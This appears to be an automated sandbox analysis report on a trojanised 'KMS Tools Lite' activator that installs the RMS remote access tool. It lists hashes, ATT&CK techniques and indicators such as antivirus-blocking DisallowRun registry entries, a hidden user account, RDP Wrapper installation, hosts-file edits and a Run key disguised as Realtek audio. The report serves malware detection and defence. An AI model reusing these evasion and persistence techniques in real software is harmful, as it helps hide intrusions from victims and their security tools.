rms | fd82570ab9005bb8112794a80707da320118e73d6b686df67ca40b0acd082af4

Analysis

max time kernel
149s
max time network
157s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
28-12-2024 21:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

KMS Tools Lite Portable/KMSTools Lite.exe
Size

5.4MB
MD5

db9c455f121b95bf2326ca1939dad9cf
SHA1

6ea25badededb817ba6b18c830906cdbbaf04837
SHA256

b8a7519e33c7e20dc3fe2383c7610e1610b9ffba438d2555c1f8b2114c094770
SHA512

61200ea650659ed6e96431660056768f3024e012d5ed86e983ee04e424b550b4dc0bdbbb5e95c8d76d0202e1613842547b8149b650ca95b6a7e562a721568fb1
SSDEEP

98304:TZ5uVBk4qgixN8bt2iGsDEmQUz9pMXnyhMiigWHDnETbvzb4EHMuZ:TXCu0bt2iGqLQaonyh9i9HDnszbdZ

Score

10^/10

rms defense_evasion discovery evasion execution lateral_movement persistence privilege_escalation rat themida trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

Detected Nirsoft tools 2 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral3/files/0x0029000000046134-9.dat	Nirsoft
behavioral3/files/0x002800000004617f-107.dat	Nirsoft

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	KMSTools Lite.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	KMS.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	IP.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	smss.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
4264	net.exe
1852	cmd.exe
1120	net1.exe

Blocks application from running via registry modification 28 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe"	KMS.exe
Key created	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe"	KMS.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe"	KMS.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
116	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWinst.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	KMSTools Lite.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	KMS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	KMSTools Lite.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	KMS.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\Control Panel\International\Geo\Nation	update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\Control Panel\International\Geo\Nation	winserv.exe

Executes dropped EXE 18 IoCs

pid	Process
2156	GSetup.exe
3456	install.exe
4908	KMS.exe
2720	update.exe
3208	7zaxxx.exe
1780	Office Installer+_x64.exe
2100	win.exe
1992	7zaxxx.exe
60	W10DigitalActivation.exe
2376	svchost.exe
1844	IP.exe
4608	smss.exe
3780	winserv.exe
4276	winserv.exe
988	unsecapp.exe
3428	RDPWinst.exe
1244	unsecapp.exe
1956	winserv.exe

Loads dropped DLL 1 IoCs

pid	Process
1092	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2480	icacls.exe
4848	icacls.exe
2472	icacls.exe
4688	icacls.exe
1048	icacls.exe
2492	icacls.exe
4944	icacls.exe
4140	icacls.exe
3380	icacls.exe
1040	icacls.exe
3276	icacls.exe
4408	icacls.exe
2276	icacls.exe
1992	icacls.exe
2952	icacls.exe
3392	icacls.exe
2152	icacls.exe
4208	icacls.exe
4380	icacls.exe
5056	icacls.exe
3424	icacls.exe
3660	icacls.exe
2360	icacls.exe
4632	icacls.exe
4284	icacls.exe
4420	icacls.exe
2740	icacls.exe
2468	icacls.exe
3684	icacls.exe
2716	icacls.exe
2296	icacls.exe
1148	icacls.exe
1056	icacls.exe
3392	icacls.exe
3168	icacls.exe
3892	icacls.exe
4608	icacls.exe
1760	icacls.exe
324	icacls.exe
3088	icacls.exe
4476	icacls.exe
3212	icacls.exe
2064	icacls.exe
1148	icacls.exe
4944	icacls.exe
1400	icacls.exe
4208	icacls.exe
3780	icacls.exe
2456	icacls.exe
4692	icacls.exe
4380	icacls.exe
1780	icacls.exe
4928	icacls.exe
1472	icacls.exe
32	icacls.exe
2432	icacls.exe
1652	icacls.exe
3236	icacls.exe
1124	icacls.exe
2376	icacls.exe
1900	icacls.exe
2468	icacls.exe
2300	icacls.exe
2952	icacls.exe

Themida packer 64 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral3/memory/4008-0-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4008-4-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4008-3-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4008-2-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4008-5-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4008-7-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4008-8-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4008-6-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/files/0x0028000000046146-19.dat	themida
behavioral3/memory/4008-28-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4908-41-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	themida
behavioral3/memory/4908-43-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	themida
behavioral3/memory/4908-45-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	themida
behavioral3/memory/4908-46-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	themida
behavioral3/memory/4908-48-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	themida
behavioral3/memory/4908-47-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	themida
behavioral3/memory/4908-44-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	themida
behavioral3/memory/4908-42-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	themida
behavioral3/memory/4908-53-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	themida
behavioral3/memory/4008-54-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/2720-55-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/2720-56-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/2720-58-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/2720-57-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/2720-59-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/2720-60-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/2720-61-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/4008-78-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/2720-79-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/4008-84-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/2720-85-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/4008-132-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/2720-133-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/files/0x0029000000046189-145.dat	themida
behavioral3/files/0x0029000000046186-168.dat	themida
behavioral3/memory/2720-170-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/4008-169-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4608-173-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	themida
behavioral3/memory/4608-172-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	themida
behavioral3/memory/4608-174-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	themida
behavioral3/memory/4608-177-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	themida
behavioral3/memory/4608-175-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	themida
behavioral3/memory/4608-176-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	themida
behavioral3/memory/4608-171-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	themida
behavioral3/memory/1844-179-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	themida
behavioral3/memory/1844-180-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	themida
behavioral3/memory/1844-182-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	themida
behavioral3/memory/1844-181-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	themida
behavioral3/memory/1844-183-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	themida
behavioral3/memory/1844-184-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	themida
behavioral3/memory/1844-178-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	themida
behavioral3/files/0x0029000000046195-208.dat	themida
behavioral3/memory/988-221-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	themida
behavioral3/memory/988-223-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	themida
behavioral3/memory/988-222-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	themida
behavioral3/memory/1844-254-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	themida
behavioral3/memory/2720-257-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	themida
behavioral3/memory/4008-256-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	themida
behavioral3/memory/4608-267-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	themida
behavioral3/memory/988-227-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	themida
behavioral3/memory/988-226-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	themida
behavioral3/memory/988-225-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	themida
behavioral3/memory/988-220-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	themida
behavioral3/memory/988-330-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	IP.exe

Checks whether UAC is enabled 1 TTPs 7 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	KMSTools Lite.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	KMS.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	update.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5028	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
47	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe

AutoIT Executable 53 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral3/memory/4008-4-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/4008-3-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/4008-5-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/4008-7-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/4008-8-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/4008-6-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/4008-28-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/4908-43-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	autoit_exe
behavioral3/memory/4908-45-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	autoit_exe
behavioral3/memory/4908-46-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	autoit_exe
behavioral3/memory/4908-48-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	autoit_exe
behavioral3/memory/4908-47-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	autoit_exe
behavioral3/memory/4908-44-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	autoit_exe
behavioral3/memory/4908-53-0x00007FF65A360000-0x00007FF65B0DD000-memory.dmp	autoit_exe
behavioral3/memory/4008-54-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/2720-58-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/2720-57-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/2720-59-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/2720-60-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/2720-61-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/4008-78-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/2720-79-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/4008-84-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/2720-85-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/4008-132-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/2720-133-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/2720-170-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/4008-169-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/4608-173-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	autoit_exe
behavioral3/memory/4608-172-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	autoit_exe
behavioral3/memory/4608-174-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	autoit_exe
behavioral3/memory/4608-177-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	autoit_exe
behavioral3/memory/4608-175-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	autoit_exe
behavioral3/memory/4608-176-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	autoit_exe
behavioral3/memory/1844-179-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	autoit_exe
behavioral3/memory/1844-180-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	autoit_exe
behavioral3/memory/1844-182-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	autoit_exe
behavioral3/memory/1844-181-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	autoit_exe
behavioral3/memory/1844-183-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	autoit_exe
behavioral3/memory/1844-184-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	autoit_exe
behavioral3/memory/988-221-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	autoit_exe
behavioral3/memory/988-223-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	autoit_exe
behavioral3/memory/988-222-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	autoit_exe
behavioral3/memory/1844-254-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp	autoit_exe
behavioral3/memory/2720-257-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/4008-256-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe
behavioral3/memory/4608-267-0x00007FF7947F0000-0x00007FF795823000-memory.dmp	autoit_exe
behavioral3/memory/988-227-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	autoit_exe
behavioral3/memory/988-226-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	autoit_exe
behavioral3/memory/988-225-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	autoit_exe
behavioral3/memory/988-330-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp	autoit_exe
behavioral3/memory/2720-344-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp	autoit_exe
behavioral3/memory/4008-343-0x00007FF62D3D0000-0x00007FF62E07A000-memory.dmp	autoit_exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWinst.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File created	C:\Windows\SysWOW64\unsecapp.exe	IP.exe
File opened for modification	C:\Windows\SysWOW64\unsecapp.exe	IP.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	reg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
4008	KMSTools Lite.exe
4908	KMS.exe
2720	update.exe
4608	smss.exe
1844	IP.exe
988	unsecapp.exe
1244	unsecapp.exe

Drops file in Program Files directory 52 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Transmission	update.exe
File opened for modification	C:\Program Files (x86)\MSI\MSI Center	update.exe
File opened for modification	C:\Program Files (x86)\Wise	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files\Loaris Trojan Remover	update.exe
File opened for modification	C:\Program Files (x86)\IObit	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File opened for modification	C:\Program Files\Process Lasso	update.exe
File opened for modification	C:\Program Files (x86)\Moo0	update.exe
File opened for modification	C:\Program Files\CPUID\HWMonitor	update.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files\QuickCPU	update.exe
